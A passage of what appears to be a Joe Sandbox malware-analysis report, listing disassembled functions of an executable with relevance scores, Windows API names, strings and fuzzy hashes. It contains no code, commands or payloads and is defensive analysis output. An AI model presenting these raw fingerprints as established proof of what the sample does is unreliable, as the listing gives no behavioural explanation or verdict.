                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: f$p
                                                                                                                                                                                                                    • API String ID: 3215553584-1290815066
                                                                                                                                                                                                                    • Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                                                                                                                                                                    • Instruction ID: 51f8df15ca82a460dbcd57d39befeea5a46e06b131a45583ae65dafc29b0deb7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C12A1A2E4C2C3C6FB209A95E04467A7672EB40754F9C4232D699977D8DF3FE981CB04
                                                                                                                                                                                                                    Function 00007FF656D1AD30 Relevance: 9.2, APIs: 6, Instructions: 193memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3859894641-0
                                                                                                                                                                                                                    • Opcode ID: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                                                                                                                                                                                    • Instruction ID: 3980e8e41336515316595dd17705a3b9822fc04ddc775096c2b975a99a03022b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74714B76A1834282EA24AF25915407C6360FF44B80F1C8B36E75EAB791DFBEE951C700
                                                                                                                                                                                                                    Function 00007FF656D2D1F0 Relevance: 9.1, APIs: 6, Instructions: 131filestringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 564229958-0
                                                                                                                                                                                                                    • Opcode ID: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                                                                                                                                                                    • Instruction ID: 0d1265a8269f3ce8009e84d45274e90d6cde699888ffc257df67a7c026c0961c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D51C562A186C295EB20DF20D8402ED6374FF94BC4F880632E64DB769ADFAAD745C740
                                                                                                                                                                                                                    Function 00007FF656CBD4CC Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 119COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                                                                                                                    • API String ID: 0-2263619337
                                                                                                                                                                                                                    • Opcode ID: c6f97123a710e8257923c5d3571785a74d70f9d1a1ac16239b0cba8ed45bb0d2
                                                                                                                                                                                                                    • Instruction ID: 91859dfcc135d7a3003f1c3608dfedfa5019375b2db0add32a7d1dbf5c000abc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6f97123a710e8257923c5d3571785a74d70f9d1a1ac16239b0cba8ed45bb0d2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0151C4B2F09A4685EF20DB65D4441BC3375EB44B98F588631DA0EEB7A5DE3EE405C340
                                                                                                                                                                                                                    Function 00007FF656CB1E04 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2592858361-0
                                                                                                                                                                                                                    • Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                                                                                                                                                                    • Instruction ID: c1d3f680def5936beb6cefcaaa5e7b3e42e9df80ca857f2073094fb169ff421c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9851CF72A0878286E720CB11E4447797BB4FB89B94F584335CA5D93BA4CF3EE505CB00
                                                                                                                                                                                                                    Function 00007FF656D44C58 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 383626216-0
                                                                                                                                                                                                                    • Opcode ID: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                                                                                                                                                                    • Instruction ID: 84007b90c3cd46c5e639d9ee4311d1aa6e27ec865d881d36800bc6854c8d442d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B031A233B046528BE714CF61D8407AC37A1FB88748F540735EE4AA3A85DF7AE989C740
                                                                                                                                                                                                                    Function 00007FF656CE1E74 Relevance: 9.1, APIs: 6, Instructions: 56threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2082702847-0
                                                                                                                                                                                                                    • Opcode ID: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                                                                                                                                                                    • Instruction ID: 0c6dae5909efff5b5aad30626c02c7605f2bffaa008ce95363ae5ec7ea0afb9b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23216661A09B4382EE169B60D41617972B0AF447B4F5C0734ED3D9BBD5DF3EE864C640
                                                                                                                                                                                                                    Function 00007FF656D22240 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                                                                                    • Opcode ID: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                                                                                                                                                                    • Instruction ID: c4911ceab798aa3784e5cfa2c26b1be4daf2cbdc0f88d3eb3afe32dc54ceefd0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B115E75B1474182EB18CF61D94802976A1FB88FC1F098B39DE1E97B94DE3EE841C740
                                                                                                                                                                                                                    Function 00007FF656D609FC Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 43455801-0
                                                                                                                                                                                                                    • Opcode ID: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                                                                                                                                                                    • Instruction ID: 4973e23c1ccd06a228bce6a1e8d67995e4f375e99f4ff939a5813e8d16e775ca
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8118C31B1829282E7148F16F904B697B60EB85B98F5C5B30CF0653B60CF7EA489CB40
                                                                                                                                                                                                                    Function 00007FF656CD2D5C Relevance: 9.0, APIs: 6, Instructions: 39keyboardCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                                                                                                    • Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                                                                                                                                                                    • Instruction ID: f40a67df9137c18e1a33fe9089e82c8a97d3a6857603cb16f2d2ccd9d60d31cf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B01112729056408AD748CF39DC481193BB2FBA8B89B589634C2499F2A5EF39D4DACB01
                                                                                                                                                                                                                    Function 00007FF656D2DA1C Relevance: 9.0, APIs: 6, Instructions: 34windowtimethreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                                                                                                    • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                                                                                                                                                                    • Instruction ID: 756e52d43c731a1037375cbd4da62012e26aed1edc3d23f21e9921de35b96a33
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD018B32A1874283EB109F22E804A29B361FFC9BD5F485734CA0A56B64DF3DD088CB00
                                                                                                                                                                                                                    Function 00007FF656D1F378 Relevance: 9.0, APIs: 6, Instructions: 33threadwindowtimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 179993514-0
                                                                                                                                                                                                                    • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                                                                                                                                                    • Instruction ID: 9335bb584f035e5d75f62523f4187219b7646016b3ee267de487dad02efae9e7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BF0AF20F1871283FB604B71E848A297392BF88784F8C4B34D90E92B50DE7ED0C5CA00
                                                                                                                                                                                                                    Function 00007FF656D1D868 Relevance: 9.0, APIs: 6, Instructions: 22memorysynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                                                                                                    • Opcode ID: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                                                                                                                                                                    • Instruction ID: a36a5ee8fb6507d42a1173533eec75401ef5297736ec8a7d5adefbe93a2e0373
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25F0AC25A15A01C2EB14DF76D8540297361EF88FE5B089731CD1E96364CE3DD4D9C300
                                                                                                                                                                                                                    Function 00007FF656D47E38 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                                                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                                                                                                    • API String ID: 1653399731-2785691316
                                                                                                                                                                                                                    • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                                                                                                                                                    • Instruction ID: e04d8935f1b698f6f79e6f74bc31bbc7a49b24ad51cb370bc2436f45f7b88711
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50B1AF72A08B418AEB50CF61D4401AD7BB0FB84798F580636EE8DA7B58DF79E545CB40
                                                                                                                                                                                                                    Function 00007FF656D4CDF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF656D4BF47), ref: 00007FF656D4CE29
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BuffCharLower
                                                                                                                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                    • API String ID: 2358735015-567219261
